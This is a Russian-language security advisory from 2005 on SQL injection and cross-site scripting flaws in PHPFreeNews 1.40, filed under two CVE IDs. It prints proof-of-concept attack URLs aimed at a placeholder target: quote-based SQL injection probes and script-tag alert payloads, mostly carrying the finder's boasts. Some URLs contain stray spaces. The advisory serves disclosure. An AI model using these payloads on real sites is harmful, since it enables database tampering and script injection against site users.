Security Lab

Несколько уязвимостей в PHPFreeNews

Дата публикации:21.08.2005
Всего просмотров:1453
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2637
CVE-2005-2638
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHPFreeNews 1.x
Уязвимые версии: PHPFreeNews 1.40

Описание: Удаленный пользователь может выполнить SQL команды и XSS нападение.

SQL инъекция: 

http://[target]/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&Ca tID=0
http://[target]/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
http://[target]/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=S earch&CatID=0
http://[target]/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27
XSS:

http://[target]/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found
By Matrix_Killer');</script>&CatID=0

http://[target]/phpfn/Se archResults.php?Match='><script>alert('Matrix_Killer
OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0

http://[target]/phpfn/SearchResults.php?Match= 1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell
Year');</script>

http://[target]/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert('0_o
Please StoP !');</script>&SearchNews=Search&CatID=0

http://[target]/phpfn/SearchResults.php?Match="><script>alert('Matrix_Killer
-> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0

URL производителя: http://www.phpfreenews.co.uk/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: PHPFreeNews v1.40 and prior Multiple